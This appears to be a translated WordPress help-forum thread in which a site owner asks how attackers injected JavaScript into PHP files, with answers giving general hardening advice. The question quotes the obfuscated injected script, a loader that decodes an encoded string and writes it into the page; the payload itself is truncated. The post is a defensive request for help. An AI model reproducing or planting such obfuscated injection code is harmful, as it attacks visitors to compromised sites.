攻击者如何将脚本写入我的php文件?

时间:2011-01-31 作者:Syom

我有一个用wordpress创建的博客,现在我有一个问题。攻击者将javascript代码写入我的文件。

假设我的插件脚本中有漏洞,但它们如何写入php文件?

下面是php文件列表的一部分,它们在其中编写脚本(index.php, wp-activate.php, wp-comments-post.php, wp-settings.php ...)

这是他们写入的javascript

<script type="text/javascript" language="javascript">kxjwm="225222 ... 2";madds=100;wljam=this;cjayr="i"+"te";geijt=116;fsmuj="wr"+cjayr;for(yadii in wljam){if(yadii.length==8 && yadii.charCodeAt(0)==madds && yadii.charCodeAt(7)==geijt){break;}}o="";bqcqp=0;qczew=wljam[yadii];dlhge=53;while (bqcqp<kxjwm.length){voxhw=0;for(evedn=0;evedn<8;evedn++){voxhw=voxhw<<1;if(kxjwm.charCodeAt(bqcqp+evedn)==dlhge){voxhw++;}}bqcqp=bqcqp+3;qczew[fsmuj](String.fromCharCode(voxhw));bqcqp=bqcqp+5;}</script>
如何防止此类攻击?

我对wordpress没有任何经验,所以任何帮助都会很好。

非常感谢

2 个回复
SO网友:MikeSchinkel

你好@Syom:

黑客通常可以访问,因为您使用管理员的名称“admin”,并且您有一个易于破解的密码。或者因为你没有更新你的软件,他们利用了一些已经发现并修补的安全漏洞。

以下是一组幻灯片,深入解释了如何保护WordPress网站的安全,这些幻灯片上周末刚刚在WordCamp Phoenix上展示:

SO网友:Rarst

有多种可能的方法:

FTP/SSH登录遭到破坏

  • 等。
    • 您应该立即联系主机支持,然后这取决于您的主机的质量和价格,他们会提供多少帮助。

    除此之外,如果你对技术技能没有信心,我建议你找一个专业清理被黑客攻击的博客的人,否则你将无法确定未来的黑客和安全细节。

    结束
    标签: php   security   hacked   小码农  

    相关推荐

    我的Page.php有什么问题?

    我从参考资料中硬编码了html。我创建了wordpress管理员,它使用默认的页面模板。然后,我在页面中输入了以下代码。php模板。结果是http://strategichospitalitysearch.com/blog/resources. <!-- Start Page Content --> <h1 class=\"blog-title\"><?php the_title(); ?></h1>